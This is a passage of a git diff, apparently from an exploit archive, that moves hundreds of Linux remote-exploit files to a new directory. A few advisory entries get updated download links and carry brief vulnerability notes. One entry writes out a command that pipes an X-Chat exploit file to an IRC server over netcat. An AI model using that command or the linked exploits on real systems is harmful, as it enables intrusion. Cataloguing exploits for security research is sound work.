similarity index 100% rename from platforms/linux/remote/174.c rename to exploits/linux/remote/174.c diff --git a/platforms/linux/remote/1741.c b/exploits/linux/remote/1741.c similarity index 100% rename from platforms/linux/remote/1741.c rename to exploits/linux/remote/1741.c diff --git a/platforms/linux/remote/1742.c b/exploits/linux/remote/1742.c similarity index 100% rename from platforms/linux/remote/1742.c rename to exploits/linux/remote/1742.c diff --git a/platforms/linux/remote/1750.c b/exploits/linux/remote/1750.c similarity index 100% rename from platforms/linux/remote/1750.c rename to exploits/linux/remote/1750.c diff --git a/platforms/linux/remote/17648.sh b/exploits/linux/remote/17648.sh similarity index 100% rename from platforms/linux/remote/17648.sh rename to exploits/linux/remote/17648.sh diff --git a/platforms/linux/remote/18.sh b/exploits/linux/remote/18.sh similarity index 100% rename from platforms/linux/remote/18.sh rename to exploits/linux/remote/18.sh diff --git a/platforms/linux/remote/181.c b/exploits/linux/remote/181.c similarity index 100% rename from platforms/linux/remote/181.c rename to exploits/linux/remote/181.c diff --git a/platforms/linux/remote/1813.c b/exploits/linux/remote/1813.c similarity index 100% rename from platforms/linux/remote/1813.c rename to exploits/linux/remote/1813.c diff --git a/platforms/linux/remote/18145.py b/exploits/linux/remote/18145.py similarity index 100% rename from platforms/linux/remote/18145.py rename to exploits/linux/remote/18145.py diff --git a/platforms/linux/remote/18280.c b/exploits/linux/remote/18280.c similarity index 100% rename from platforms/linux/remote/18280.c rename to exploits/linux/remote/18280.c diff --git a/platforms/linux/remote/18368.rb b/exploits/linux/remote/18368.rb similarity index 100% rename from platforms/linux/remote/18368.rb rename to exploits/linux/remote/18368.rb diff --git a/platforms/linux/remote/18393.rb b/exploits/linux/remote/18393.rb similarity index 100% rename from platforms/linux/remote/18393.rb rename to exploits/linux/remote/18393.rb diff --git a/platforms/linux/remote/18492.rb b/exploits/linux/remote/18492.rb similarity index 100% rename from platforms/linux/remote/18492.rb rename to exploits/linux/remote/18492.rb diff --git a/platforms/linux/remote/18761.rb b/exploits/linux/remote/18761.rb similarity index 100% rename from platforms/linux/remote/18761.rb rename to exploits/linux/remote/18761.rb diff --git a/platforms/linux/remote/18942.rb b/exploits/linux/remote/18942.rb similarity index 100% rename from platforms/linux/remote/18942.rb rename to exploits/linux/remote/18942.rb diff --git a/platforms/linux/remote/19.c b/exploits/linux/remote/19.c similarity index 100% rename from platforms/linux/remote/19.c rename to exploits/linux/remote/19.c diff --git a/platforms/linux/remote/19028.txt b/exploits/linux/remote/19028.txt similarity index 100% rename from platforms/linux/remote/19028.txt rename to exploits/linux/remote/19028.txt diff --git a/platforms/linux/remote/19069.txt b/exploits/linux/remote/19069.txt similarity index 100% rename from platforms/linux/remote/19069.txt rename to exploits/linux/remote/19069.txt diff --git a/platforms/linux/remote/19079.c b/exploits/linux/remote/19079.c similarity index 100% rename from platforms/linux/remote/19079.c rename to exploits/linux/remote/19079.c diff --git a/platforms/linux/remote/19086.c b/exploits/linux/remote/19086.c similarity index 100% rename from platforms/linux/remote/19086.c rename to exploits/linux/remote/19086.c diff --git a/platforms/linux/remote/19087.c b/exploits/linux/remote/19087.c similarity index 100% rename from platforms/linux/remote/19087.c rename to exploits/linux/remote/19087.c diff --git a/platforms/linux/remote/19096.c b/exploits/linux/remote/19096.c similarity index 100% rename from platforms/linux/remote/19096.c rename to exploits/linux/remote/19096.c diff --git a/platforms/linux/remote/19104.c b/exploits/linux/remote/19104.c similarity index 100% rename from platforms/linux/remote/19104.c rename to exploits/linux/remote/19104.c diff --git a/platforms/linux/remote/19105.c b/exploits/linux/remote/19105.c similarity index 100% rename from platforms/linux/remote/19105.c rename to exploits/linux/remote/19105.c diff --git a/platforms/linux/remote/19107.c b/exploits/linux/remote/19107.c similarity index 100% rename from platforms/linux/remote/19107.c rename to exploits/linux/remote/19107.c diff --git a/platforms/linux/remote/19109.c b/exploits/linux/remote/19109.c similarity index 100% rename from platforms/linux/remote/19109.c rename to exploits/linux/remote/19109.c diff --git a/platforms/linux/remote/19111.c b/exploits/linux/remote/19111.c similarity index 100% rename from platforms/linux/remote/19111.c rename to exploits/linux/remote/19111.c diff --git a/platforms/linux/remote/19112.c b/exploits/linux/remote/19112.c similarity index 100% rename from platforms/linux/remote/19112.c rename to exploits/linux/remote/19112.c diff --git a/platforms/linux/remote/19119.c b/exploits/linux/remote/19119.c similarity index 100% rename from platforms/linux/remote/19119.c rename to exploits/linux/remote/19119.c diff --git a/platforms/linux/remote/19123.c b/exploits/linux/remote/19123.c similarity index 100% rename from platforms/linux/remote/19123.c rename to exploits/linux/remote/19123.c diff --git a/platforms/linux/remote/19124.txt b/exploits/linux/remote/19124.txt similarity index 100% rename from platforms/linux/remote/19124.txt rename to exploits/linux/remote/19124.txt diff --git a/platforms/linux/remote/19218.c b/exploits/linux/remote/19218.c similarity index 100% rename from platforms/linux/remote/19218.c rename to exploits/linux/remote/19218.c diff --git a/platforms/linux/remote/19219.c b/exploits/linux/remote/19219.c similarity index 100% rename from platforms/linux/remote/19219.c rename to exploits/linux/remote/19219.c diff --git a/platforms/linux/remote/19226.c b/exploits/linux/remote/19226.c similarity index 100% rename from platforms/linux/remote/19226.c rename to exploits/linux/remote/19226.c diff --git a/platforms/linux/remote/19247.c b/exploits/linux/remote/19247.c similarity index 100% rename from platforms/linux/remote/19247.c rename to exploits/linux/remote/19247.c diff --git a/platforms/linux/remote/19251.c b/exploits/linux/remote/19251.c similarity index 100% rename from platforms/linux/remote/19251.c rename to exploits/linux/remote/19251.c diff --git a/platforms/linux/remote/19253.txt b/exploits/linux/remote/19253.txt similarity index 100% rename from platforms/linux/remote/19253.txt rename to exploits/linux/remote/19253.txt diff --git a/platforms/linux/remote/19297.c b/exploits/linux/remote/19297.c similarity index 100% rename from platforms/linux/remote/19297.c rename to exploits/linux/remote/19297.c diff --git a/platforms/linux/remote/19458.c b/exploits/linux/remote/19458.c similarity index 100% rename from platforms/linux/remote/19458.c rename to exploits/linux/remote/19458.c diff --git a/platforms/linux/remote/19475.c b/exploits/linux/remote/19475.c similarity index 100% rename from platforms/linux/remote/19475.c rename to exploits/linux/remote/19475.c diff --git a/platforms/linux/remote/19476.c b/exploits/linux/remote/19476.c similarity index 100% rename from platforms/linux/remote/19476.c rename to exploits/linux/remote/19476.c diff --git a/platforms/linux/remote/19503.txt b/exploits/linux/remote/19503.txt similarity index 100% rename from platforms/linux/remote/19503.txt rename to exploits/linux/remote/19503.txt diff --git a/platforms/linux/remote/19522.txt b/exploits/linux/remote/19522.txt similarity index 92% rename from platforms/linux/remote/19522.txt rename to exploits/linux/remote/19522.txt index fac911f3a..3ad7437f2 100644 --- a/platforms/linux/remote/19522.txt +++ b/exploits/linux/remote/19522.txt @@ -4,4 +4,4 @@ A vulnerability in the Linux kernel allows remote users to guess the initial seq The function 'secure_tcp_sequence_number' in the file 'drivers/char/random.c' at line 1684 is used to generate the initial sequence number. It used the MD4 hash with a set of inputs to generate the new ISN. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19522.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19522.tar.gz \ No newline at end of file diff --git a/platforms/linux/remote/19557.txt b/exploits/linux/remote/19557.txt similarity index 100% rename from platforms/linux/remote/19557.txt rename to exploits/linux/remote/19557.txt diff --git a/platforms/linux/remote/19558.c b/exploits/linux/remote/19558.c similarity index 100% rename from platforms/linux/remote/19558.c rename to exploits/linux/remote/19558.c diff --git a/platforms/linux/remote/19567.txt b/exploits/linux/remote/19567.txt similarity index 100% rename from platforms/linux/remote/19567.txt rename to exploits/linux/remote/19567.txt diff --git a/platforms/linux/remote/19634.c b/exploits/linux/remote/19634.c similarity index 100% rename from platforms/linux/remote/19634.c rename to exploits/linux/remote/19634.c diff --git a/platforms/linux/remote/19729.c b/exploits/linux/remote/19729.c similarity index 100% rename from platforms/linux/remote/19729.c rename to exploits/linux/remote/19729.c diff --git a/platforms/linux/remote/19801.c b/exploits/linux/remote/19801.c similarity index 100% rename from platforms/linux/remote/19801.c rename to exploits/linux/remote/19801.c diff --git a/platforms/linux/remote/19868.c b/exploits/linux/remote/19868.c similarity index 100% rename from platforms/linux/remote/19868.c rename to exploits/linux/remote/19868.c diff --git a/platforms/linux/remote/19879.txt b/exploits/linux/remote/19879.txt similarity index 100% rename from platforms/linux/remote/19879.txt rename to exploits/linux/remote/19879.txt diff --git a/platforms/linux/remote/19891.c b/exploits/linux/remote/19891.c similarity index 100% rename from platforms/linux/remote/19891.c rename to exploits/linux/remote/19891.c diff --git a/platforms/linux/remote/19892.txt b/exploits/linux/remote/19892.txt similarity index 95% rename from platforms/linux/remote/19892.txt rename to exploits/linux/remote/19892.txt index 91e69194c..1eb6c2f50 100644 --- a/platforms/linux/remote/19892.txt +++ b/exploits/linux/remote/19892.txt @@ -4,4 +4,4 @@ A vulnerability exists in the DNS decode capabilities provided as part of the tc When tcpdump is logging to a file, it is not affected by this vulnerability. Upon reading from a file which contains recorded packets, it will enter an infinite loop when it encounters packets of this type. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/19892.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/19892.tar.gz \ No newline at end of file diff --git a/platforms/linux/remote/19926.c b/exploits/linux/remote/19926.c similarity index 100% rename from platforms/linux/remote/19926.c rename to exploits/linux/remote/19926.c diff --git a/platforms/linux/remote/19947.c b/exploits/linux/remote/19947.c similarity index 100% rename from platforms/linux/remote/19947.c rename to exploits/linux/remote/19947.c diff --git a/platforms/linux/remote/19948.c b/exploits/linux/remote/19948.c similarity index 100% rename from platforms/linux/remote/19948.c rename to exploits/linux/remote/19948.c diff --git a/platforms/linux/remote/19966.c b/exploits/linux/remote/19966.c similarity index 100% rename from platforms/linux/remote/19966.c rename to exploits/linux/remote/19966.c diff --git a/platforms/linux/remote/19978.pl b/exploits/linux/remote/19978.pl similarity index 100% rename from platforms/linux/remote/19978.pl rename to exploits/linux/remote/19978.pl diff --git a/platforms/linux/remote/19983.c b/exploits/linux/remote/19983.c similarity index 100% rename from platforms/linux/remote/19983.c rename to exploits/linux/remote/19983.c diff --git a/platforms/linux/remote/19998.c b/exploits/linux/remote/19998.c similarity index 100% rename from platforms/linux/remote/19998.c rename to exploits/linux/remote/19998.c diff --git a/platforms/linux/remote/20009.py b/exploits/linux/remote/20009.py similarity index 100% rename from platforms/linux/remote/20009.py rename to exploits/linux/remote/20009.py diff --git a/platforms/linux/remote/20031.c b/exploits/linux/remote/20031.c similarity index 100% rename from platforms/linux/remote/20031.c rename to exploits/linux/remote/20031.c diff --git a/platforms/linux/remote/20043.c b/exploits/linux/remote/20043.c similarity index 100% rename from platforms/linux/remote/20043.c rename to exploits/linux/remote/20043.c diff --git a/platforms/linux/remote/20060.c b/exploits/linux/remote/20060.c similarity index 100% rename from platforms/linux/remote/20060.c rename to exploits/linux/remote/20060.c diff --git a/platforms/linux/remote/20061.c b/exploits/linux/remote/20061.c similarity index 100% rename from platforms/linux/remote/20061.c rename to exploits/linux/remote/20061.c diff --git a/platforms/linux/remote/20075.c b/exploits/linux/remote/20075.c similarity index 100% rename from platforms/linux/remote/20075.c rename to exploits/linux/remote/20075.c diff --git a/platforms/linux/remote/20076.c b/exploits/linux/remote/20076.c similarity index 100% rename from platforms/linux/remote/20076.c rename to exploits/linux/remote/20076.c diff --git a/platforms/linux/remote/20077.c b/exploits/linux/remote/20077.c similarity index 100% rename from platforms/linux/remote/20077.c rename to exploits/linux/remote/20077.c diff --git a/platforms/linux/remote/20088.py b/exploits/linux/remote/20088.py similarity index 100% rename from platforms/linux/remote/20088.py rename to exploits/linux/remote/20088.py diff --git a/platforms/linux/remote/20105.txt b/exploits/linux/remote/20105.txt similarity index 100% rename from platforms/linux/remote/20105.txt rename to exploits/linux/remote/20105.txt diff --git a/platforms/linux/remote/20113.rb b/exploits/linux/remote/20113.rb similarity index 100% rename from platforms/linux/remote/20113.rb rename to exploits/linux/remote/20113.rb diff --git a/platforms/linux/remote/20143.txt b/exploits/linux/remote/20143.txt similarity index 100% rename from platforms/linux/remote/20143.txt rename to exploits/linux/remote/20143.txt diff --git a/platforms/linux/remote/20145.c b/exploits/linux/remote/20145.c similarity index 100% rename from platforms/linux/remote/20145.c rename to exploits/linux/remote/20145.c diff --git a/platforms/linux/remote/20157.c b/exploits/linux/remote/20157.c similarity index 100% rename from platforms/linux/remote/20157.c rename to exploits/linux/remote/20157.c diff --git a/platforms/linux/remote/20159.c b/exploits/linux/remote/20159.c similarity index 100% rename from platforms/linux/remote/20159.c rename to exploits/linux/remote/20159.c diff --git a/platforms/linux/remote/20161.txt b/exploits/linux/remote/20161.txt similarity index 100% rename from platforms/linux/remote/20161.txt rename to exploits/linux/remote/20161.txt diff --git a/platforms/linux/remote/20210.txt b/exploits/linux/remote/20210.txt similarity index 100% rename from platforms/linux/remote/20210.txt rename to exploits/linux/remote/20210.txt diff --git a/platforms/linux/remote/20220.txt b/exploits/linux/remote/20220.txt similarity index 100% rename from platforms/linux/remote/20220.txt rename to exploits/linux/remote/20220.txt diff --git a/platforms/linux/remote/20236.txt b/exploits/linux/remote/20236.txt similarity index 100% rename from platforms/linux/remote/20236.txt rename to exploits/linux/remote/20236.txt diff --git a/platforms/linux/remote/20237.c b/exploits/linux/remote/20237.c similarity index 100% rename from platforms/linux/remote/20237.c rename to exploits/linux/remote/20237.c diff --git a/platforms/linux/remote/20246.txt b/exploits/linux/remote/20246.txt similarity index 100% rename from platforms/linux/remote/20246.txt rename to exploits/linux/remote/20246.txt diff --git a/platforms/linux/remote/20253.sh b/exploits/linux/remote/20253.sh similarity index 100% rename from platforms/linux/remote/20253.sh rename to exploits/linux/remote/20253.sh diff --git a/platforms/linux/remote/20293.pl b/exploits/linux/remote/20293.pl similarity index 100% rename from platforms/linux/remote/20293.pl rename to exploits/linux/remote/20293.pl diff --git a/platforms/linux/remote/20308.c b/exploits/linux/remote/20308.c similarity index 100% rename from platforms/linux/remote/20308.c rename to exploits/linux/remote/20308.c diff --git a/platforms/linux/remote/204.c b/exploits/linux/remote/204.c similarity index 100% rename from platforms/linux/remote/204.c rename to exploits/linux/remote/204.c diff --git a/platforms/linux/remote/20496.c b/exploits/linux/remote/20496.c similarity index 100% rename from platforms/linux/remote/20496.c rename to exploits/linux/remote/20496.c diff --git a/platforms/linux/remote/20551.pl b/exploits/linux/remote/20551.pl similarity index 100% rename from platforms/linux/remote/20551.pl rename to exploits/linux/remote/20551.pl diff --git a/platforms/linux/remote/20569.c b/exploits/linux/remote/20569.c similarity index 100% rename from platforms/linux/remote/20569.c rename to exploits/linux/remote/20569.c diff --git a/platforms/linux/remote/20597.txt b/exploits/linux/remote/20597.txt similarity index 100% rename from platforms/linux/remote/20597.txt rename to exploits/linux/remote/20597.txt diff --git a/platforms/linux/remote/20619.c b/exploits/linux/remote/20619.c similarity index 100% rename from platforms/linux/remote/20619.c rename to exploits/linux/remote/20619.c diff --git a/platforms/linux/remote/20622.c b/exploits/linux/remote/20622.c similarity index 100% rename from platforms/linux/remote/20622.c rename to exploits/linux/remote/20622.c diff --git a/platforms/linux/remote/20636.txt b/exploits/linux/remote/20636.txt similarity index 100% rename from platforms/linux/remote/20636.txt rename to exploits/linux/remote/20636.txt diff --git a/platforms/linux/remote/20690.sh b/exploits/linux/remote/20690.sh similarity index 100% rename from platforms/linux/remote/20690.sh rename to exploits/linux/remote/20690.sh diff --git a/platforms/linux/remote/20727.c b/exploits/linux/remote/20727.c similarity index 100% rename from platforms/linux/remote/20727.c rename to exploits/linux/remote/20727.c diff --git a/platforms/linux/remote/20748.pl b/exploits/linux/remote/20748.pl similarity index 100% rename from platforms/linux/remote/20748.pl rename to exploits/linux/remote/20748.pl diff --git a/platforms/linux/remote/20749.c b/exploits/linux/remote/20749.c similarity index 100% rename from platforms/linux/remote/20749.c rename to exploits/linux/remote/20749.c diff --git a/platforms/linux/remote/20765.pl b/exploits/linux/remote/20765.pl similarity index 100% rename from platforms/linux/remote/20765.pl rename to exploits/linux/remote/20765.pl diff --git a/platforms/linux/remote/20796.rb b/exploits/linux/remote/20796.rb similarity index 100% rename from platforms/linux/remote/20796.rb rename to exploits/linux/remote/20796.rb diff --git a/platforms/linux/remote/208.c b/exploits/linux/remote/208.c similarity index 100% rename from platforms/linux/remote/208.c rename to exploits/linux/remote/208.c diff --git a/platforms/linux/remote/20902.c b/exploits/linux/remote/20902.c similarity index 100% rename from platforms/linux/remote/20902.c rename to exploits/linux/remote/20902.c diff --git a/platforms/linux/remote/20908.c b/exploits/linux/remote/20908.c similarity index 100% rename from platforms/linux/remote/20908.c rename to exploits/linux/remote/20908.c diff --git a/platforms/linux/remote/20924.txt b/exploits/linux/remote/20924.txt similarity index 90% rename from platforms/linux/remote/20924.txt rename to exploits/linux/remote/20924.txt index 3e56c67d6..2088b6fc4 100644 --- a/platforms/linux/remote/20924.txt +++ b/exploits/linux/remote/20924.txt @@ -4,4 +4,4 @@ MDBMS is a free relational database management system. A buffer overflow condition exists in MDBMS. By issuing the '\s' command to display the query buffer when it contains a large amount of data, it may be possible for a remote user to trigger this condition and execute arbitrary code. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20924.tar.gz \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/20924.tar.gz \ No newline at end of file diff --git a/platforms/linux/remote/20929.c b/exploits/linux/remote/20929.c similarity index 100% rename from platforms/linux/remote/20929.c rename to exploits/linux/remote/20929.c diff --git a/platforms/linux/remote/20936.c b/exploits/linux/remote/20936.c similarity index 100% rename from platforms/linux/remote/20936.c rename to exploits/linux/remote/20936.c diff --git a/platforms/linux/remote/20953.c b/exploits/linux/remote/20953.c similarity index 100% rename from platforms/linux/remote/20953.c rename to exploits/linux/remote/20953.c diff --git a/platforms/linux/remote/20954.pl b/exploits/linux/remote/20954.pl similarity index 100% rename from platforms/linux/remote/20954.pl rename to exploits/linux/remote/20954.pl diff --git a/platforms/linux/remote/20994.txt b/exploits/linux/remote/20994.txt similarity index 100% rename from platforms/linux/remote/20994.txt rename to exploits/linux/remote/20994.txt diff --git a/platforms/linux/remote/20998.c b/exploits/linux/remote/20998.c similarity index 100% rename from platforms/linux/remote/20998.c rename to exploits/linux/remote/20998.c diff --git a/platforms/linux/remote/21017.txt b/exploits/linux/remote/21017.txt similarity index 100% rename from platforms/linux/remote/21017.txt rename to exploits/linux/remote/21017.txt diff --git a/platforms/linux/remote/21019.txt b/exploits/linux/remote/21019.txt similarity index 100% rename from platforms/linux/remote/21019.txt rename to exploits/linux/remote/21019.txt diff --git a/platforms/linux/remote/21037.c b/exploits/linux/remote/21037.c similarity index 100% rename from platforms/linux/remote/21037.c rename to exploits/linux/remote/21037.c diff --git a/platforms/linux/remote/21049.c b/exploits/linux/remote/21049.c similarity index 100% rename from platforms/linux/remote/21049.c rename to exploits/linux/remote/21049.c diff --git a/platforms/linux/remote/21050.c b/exploits/linux/remote/21050.c similarity index 100% rename from platforms/linux/remote/21050.c rename to exploits/linux/remote/21050.c diff --git a/platforms/linux/remote/21075.txt b/exploits/linux/remote/21075.txt similarity index 100% rename from platforms/linux/remote/21075.txt rename to exploits/linux/remote/21075.txt diff --git a/platforms/linux/remote/21095.txt b/exploits/linux/remote/21095.txt similarity index 100% rename from platforms/linux/remote/21095.txt rename to exploits/linux/remote/21095.txt diff --git a/platforms/linux/remote/21112.php b/exploits/linux/remote/21112.php similarity index 100% rename from platforms/linux/remote/21112.php rename to exploits/linux/remote/21112.php diff --git a/platforms/linux/remote/21136.rb b/exploits/linux/remote/21136.rb similarity index 100% rename from platforms/linux/remote/21136.rb rename to exploits/linux/remote/21136.rb diff --git a/platforms/linux/remote/21151.txt b/exploits/linux/remote/21151.txt similarity index 100% rename from platforms/linux/remote/21151.txt rename to exploits/linux/remote/21151.txt diff --git a/platforms/linux/remote/21152.c b/exploits/linux/remote/21152.c similarity index 100% rename from platforms/linux/remote/21152.c rename to exploits/linux/remote/21152.c diff --git a/platforms/linux/remote/21190.rb b/exploits/linux/remote/21190.rb similarity index 100% rename from platforms/linux/remote/21190.rb rename to exploits/linux/remote/21190.rb diff --git a/platforms/linux/remote/21191.rb b/exploits/linux/remote/21191.rb similarity index 100% rename from platforms/linux/remote/21191.rb rename to exploits/linux/remote/21191.rb diff --git a/platforms/linux/remote/21192.c b/exploits/linux/remote/21192.c similarity index 100% rename from platforms/linux/remote/21192.c rename to exploits/linux/remote/21192.c diff --git a/platforms/linux/remote/21200.c b/exploits/linux/remote/21200.c similarity index 100% rename from platforms/linux/remote/21200.c rename to exploits/linux/remote/21200.c diff --git a/platforms/linux/remote/21205.c b/exploits/linux/remote/21205.c similarity index 100% rename from platforms/linux/remote/21205.c rename to exploits/linux/remote/21205.c diff --git a/platforms/linux/remote/21210.txt b/exploits/linux/remote/21210.txt similarity index 93% rename from platforms/linux/remote/21210.txt rename to exploits/linux/remote/21210.txt index 46191089c..9c7c0c417 100644 --- a/platforms/linux/remote/21210.txt +++ b/exploits/linux/remote/21210.txt @@ -8,4 +8,4 @@ Although this vulnerability exists in recent versions of X-Chat, the option to e cat 21210.exploit - | netcat server 6667 -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21210.exploit \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/21210.exploit \ No newline at end of file diff --git a/platforms/linux/remote/21242.c b/exploits/linux/remote/21242.c similarity index 100% rename from platforms/linux/remote/21242.c rename to exploits/linux/remote/21242.c diff --git a/platforms/linux/remote/21289.c b/exploits/linux/remote/21289.c similarity index 100% rename from platforms/linux/remote/21289.c rename to exploits/linux/remote/21289.c diff --git a/platforms/linux/remote/21309.c b/exploits/linux/remote/21309.c similarity index 100% rename from platforms/linux/remote/21309.c rename to exploits/linux/remote/21309.c diff --git a/platforms/linux/remote/21310.txt b/exploits/linux/remote/21310.txt similarity index 100% rename from platforms/linux/remote/21310.txt rename to exploits/linux/remote/21310.txt diff --git a/platforms/linux/remote/21365.txt b/exploits/linux/remote/21365.txt similarity index 100% rename from platforms/linux/remote/21365.txt rename to exploits/linux/remote/21365.txt diff --git a/platforms/linux/remote/21402.txt b/exploits/linux/remote/21402.txt similarity index 93% rename from platforms/linux/remote/21402.txt rename to exploits/linux/remote/21402.txt index 502a89fe5..6639ec1b9 100644 --- a/platforms/linux/remote/21402.txt +++ b/exploits/linux/remote/21402.txt @@ -4,4 +4,4 @@ A buffer overflow condition exists in the OpenSSH server. The condition is explo The vulnerability is related to the handling of Kerberos 4 TGT/AFS tokens passed by the client. An unbounded string copy operation may result in a stack overflow if the TGT/token data is malformed. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/21402.tar \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/21402.tar \ No newline at end of file diff --git a/platforms/linux/remote/21422.txt b/exploits/linux/remote/21422.txt similarity index 100% rename from platforms/linux/remote/21422.txt rename to exploits/linux/remote/21422.txt diff --git a/platforms/linux/remote/21442.c b/exploits/linux/remote/21442.c similarity index 100% rename from platforms/linux/remote/21442.c rename to exploits/linux/remote/21442.c diff --git a/platforms/linux/remote/21443.c b/exploits/linux/remote/21443.c similarity index 100% rename from platforms/linux/remote/21443.c rename to exploits/linux/remote/21443.c diff --git a/platforms/linux/remote/21520.py b/exploits/linux/remote/21520.py similarity index 100% rename from platforms/linux/remote/21520.py rename to exploits/linux/remote/21520.py diff --git a/platforms/linux/remote/21586.txt b/exploits/linux/remote/21586.txt similarity index 100% rename from platforms/linux/remote/21586.txt rename to exploits/linux/remote/21586.txt diff --git a/platforms/linux/remote/21602.txt b/exploits/linux/remote/21602.txt similarity index 100% rename from platforms/linux/remote/21602.txt rename to exploits/linux/remote/21602.txt diff --git a/platforms/linux/remote/21604.txt b/exploits/linux/remote/21604.txt similarity index 100% rename from platforms/linux/remote/21604.txt rename to exploits/linux/remote/21604.txt diff --git a/platforms/linux/remote/21663.c b/exploits/linux/remote/21663.c similarity index 100% rename from platforms/linux/remote/21663.c rename to exploits/linux/remote/21663.c diff --git a/platforms/linux/remote/21706.txt b/exploits/linux/remote/21706.txt similarity index 100% rename from platforms/linux/remote/21706.txt rename to exploits/linux/remote/21706.txt diff --git a/platforms/linux/remote/21722.pl b/exploits/linux/remote/21722.pl similarity index 100% rename from platforms/linux/remote/21722.pl rename to exploits/linux/remote/21722.pl diff --git a/platforms/linux/remote/21725.c b/exploits/linux/remote/21725.c similarity index 100% rename from platforms/linux/remote/21725.c rename to exploits/linux/remote/21725.c diff --git a/platforms/linux/remote/21726.c b/exploits/linux/remote/21726.c similarity index 100% rename from platforms/linux/remote/21726.c rename to exploits/linux/remote/21726.c diff --git a/platforms/linux/remote/21765.pl b/exploits/linux/remote/21765.pl similarity index 100% rename from platforms/linux/remote/21765.pl rename to exploits/linux/remote/21765.pl diff --git a/platforms/linux/remote/21784.c b/exploits/linux/remote/21784.c similarity index 100% rename from platforms/linux/remote/21784.c rename to exploits/linux/remote/21784.c diff --git a/platforms/linux/remote/21818.c b/exploits/linux/remote/21818.c similarity index 100% rename from platforms/linux/remote/21818.c rename to exploits/linux/remote/21818.c diff --git a/platforms/linux/remote/2185.pl b/exploits/linux/remote/2185.pl similarity index 100% rename from platforms/linux/remote/2185.pl rename to exploits/linux/remote/2185.pl diff --git a/platforms/linux/remote/21850.rb b/exploits/linux/remote/21850.rb similarity index 100% rename from platforms/linux/remote/21850.rb rename to exploits/linux/remote/21850.rb diff --git a/platforms/linux/remote/21857.pl b/exploits/linux/remote/21857.pl similarity index 100% rename from platforms/linux/remote/21857.pl rename to exploits/linux/remote/21857.pl diff --git a/platforms/linux/remote/21858.txt b/exploits/linux/remote/21858.txt similarity index 100% rename from platforms/linux/remote/21858.txt rename to exploits/linux/remote/21858.txt diff --git a/platforms/linux/remote/21870.txt b/exploits/linux/remote/21870.txt similarity index 100% rename from platforms/linux/remote/21870.txt rename to exploits/linux/remote/21870.txt diff --git a/platforms/linux/remote/21934.txt b/exploits/linux/remote/21934.txt similarity index 100% rename from platforms/linux/remote/21934.txt rename to exploits/linux/remote/21934.txt diff --git a/platforms/linux/remote/21936.c b/exploits/linux/remote/21936.c similarity index 100% rename from platforms/linux/remote/21936.c rename to exploits/linux/remote/21936.c diff --git a/platforms/linux/remote/21937.c b/exploits/linux/remote/21937.c similarity index 100% rename from platforms/linux/remote/21937.c rename to exploits/linux/remote/21937.c diff --git a/platforms/linux/remote/21945.pl b/exploits/linux/remote/21945.pl similarity index 100% rename from platforms/linux/remote/21945.pl rename to exploits/linux/remote/21945.pl diff --git a/platforms/linux/remote/21998.c b/exploits/linux/remote/21998.c similarity index 100% rename from platforms/linux/remote/21998.c rename to exploits/linux/remote/21998.c diff --git a/platforms/linux/remote/220.c b/exploits/linux/remote/220.c similarity index 100% rename from platforms/linux/remote/220.c rename to exploits/linux/remote/220.c diff --git a/platforms/linux/remote/22012.c b/exploits/linux/remote/22012.c similarity index 100% rename from platforms/linux/remote/22012.c rename to exploits/linux/remote/22012.c diff --git a/platforms/linux/remote/22013.c b/exploits/linux/remote/22013.c similarity index 100% rename from platforms/linux/remote/22013.c rename to exploits/linux/remote/22013.c diff --git a/platforms/linux/remote/22016.c b/exploits/linux/remote/22016.c similarity index 100% rename from platforms/linux/remote/22016.c rename to exploits/linux/remote/22016.c diff --git a/platforms/linux/remote/22021.sh b/exploits/linux/remote/22021.sh similarity index 100% rename from platforms/linux/remote/22021.sh rename to exploits/linux/remote/22021.sh diff --git a/platforms/linux/remote/22026.txt b/exploits/linux/remote/22026.txt similarity index 100% rename from platforms/linux/remote/22026.txt rename to exploits/linux/remote/22026.txt diff --git a/platforms/linux/remote/22034.pl b/exploits/linux/remote/22034.pl similarity index 100% rename from platforms/linux/remote/22034.pl rename to exploits/linux/remote/22034.pl diff --git a/platforms/linux/remote/22035.c b/exploits/linux/remote/22035.c similarity index 100% rename from platforms/linux/remote/22035.c rename to exploits/linux/remote/22035.c diff --git a/platforms/linux/remote/22046.c b/exploits/linux/remote/22046.c similarity index 100% rename from platforms/linux/remote/22046.c rename to exploits/linux/remote/22046.c diff --git a/platforms/linux/remote/22057.pl b/exploits/linux/remote/22057.pl similarity index 100% rename from platforms/linux/remote/22057.pl rename to exploits/linux/remote/22057.pl diff --git a/platforms/linux/remote/22058.c b/exploits/linux/remote/22058.c similarity index 100% rename from platforms/linux/remote/22058.c rename to exploits/linux/remote/22058.c diff --git a/platforms/linux/remote/22063.c b/exploits/linux/remote/22063.c similarity index 100% rename from platforms/linux/remote/22063.c rename to exploits/linux/remote/22063.c diff --git a/platforms/linux/remote/22064.pl b/exploits/linux/remote/22064.pl similarity index 100% rename from platforms/linux/remote/22064.pl rename to exploits/linux/remote/22064.pl diff --git a/platforms/linux/remote/22072.c b/exploits/linux/remote/22072.c similarity index 100% rename from platforms/linux/remote/22072.c rename to exploits/linux/remote/22072.c diff --git a/platforms/linux/remote/22091.c b/exploits/linux/remote/22091.c similarity index 100% rename from platforms/linux/remote/22091.c rename to exploits/linux/remote/22091.c diff --git a/platforms/linux/remote/22101.c b/exploits/linux/remote/22101.c similarity index 100% rename from platforms/linux/remote/22101.c rename to exploits/linux/remote/22101.c diff --git a/platforms/linux/remote/22106.txt b/exploits/linux/remote/22106.txt similarity index 100% rename from platforms/linux/remote/22106.txt rename to exploits/linux/remote/22106.txt diff --git a/platforms/linux/remote/22129.c b/exploits/linux/remote/22129.c similarity index 100% rename from platforms/linux/remote/22129.c rename to exploits/linux/remote/22129.c diff --git a/platforms/linux/remote/22135.c b/exploits/linux/remote/22135.c similarity index 100% rename from platforms/linux/remote/22135.c rename to 